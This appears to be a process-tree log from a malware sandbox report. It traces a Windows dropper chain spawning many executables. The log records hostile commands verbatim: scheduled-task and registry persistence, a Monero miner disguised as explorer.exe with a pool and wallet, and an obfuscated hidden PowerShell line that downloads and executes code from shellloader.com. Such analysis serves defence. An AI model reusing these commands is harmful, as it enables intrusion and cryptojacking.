C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:4864
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:4668
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:5340
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:6404
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:6316
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:6056
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:6564
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:5748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
PID:4952 -
C:\ProgramData\4866756.exe"C:\ProgramData\4866756.exe"8⤵PID:4940
-
-
C:\ProgramData\936612.exe"C:\ProgramData\936612.exe"8⤵PID:5348
-
-
C:\ProgramData\199137.exe"C:\ProgramData\199137.exe"8⤵PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:3160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 8088⤵
- Program crash
PID:5520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 8408⤵
- Program crash
PID:5944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 8968⤵
- Program crash
PID:5340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 9608⤵
- Program crash
PID:4956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 10648⤵
- Program crash
PID:4912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 11088⤵
- Program crash
PID:5244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 11248⤵
- Program crash
PID:5656
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5032 -s 15288⤵
- Program crash
PID:2968
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:6012
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "9⤵PID:5932
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe10⤵PID:5964
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe11⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵PID:2256
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵PID:6528
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵PID:6620
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
PID:6632
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe10⤵PID:4944
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵PID:5876
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:4676
-
C:\Users\Admin\AppData\Local\Temp\is-ON6NP.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-ON6NP.tmp\setup_2.tmp" /SL5="$202D2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:400
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\is-9THDG.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9THDG.tmp\setup_2.tmp" /SL5="$10366,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\is-7U0DA.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-7U0DA.tmp\postback.exe" ss111⤵PID:2256
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:5428
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵PID:6796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵PID:6872
-
-
-
C:\Users\Admin\AppData\Local\Temp\W5xqo6FEE.exe"C:\Users\Admin\AppData\Local\Temp\W5xqo6FEE.exe"13⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"14⤵PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\40sbExnVA.exe"C:\Users\Admin\AppData\Local\Temp\40sbExnVA.exe"13⤵PID:6976
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"14⤵PID:6224
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:4484
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:5184
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe5⤵
- Executes dropped EXE
PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵PID:2864
-
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu2156de5489c19.exeThu2156de5489c19.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\tmp909_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp909_tmp.exe"6⤵PID:4640
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:5132
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵PID:5212
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:6048
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv9⤵PID:1664
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u11⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u12⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u13⤵PID:4384
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u14⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u15⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u16⤵PID:6688
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u17⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u18⤵PID:7036
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
PID:656
-
-
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5828 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5924
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5232
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6136 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5820
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6348
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6400
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4308
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 014DBF9A9FD2BCF6D63C70AE969F0199 C2⤵PID:6504
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6208 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6636
-
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe1⤵PID:6732
-
C:\Users\Admin\AppData\Local\Temp\62AE.exeC:\Users\Admin\AppData\Local\Temp\62AE.exe1⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\8605.exeC:\Users\Admin\AppData\Local\Temp\8605.exe1⤵PID:6580
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6016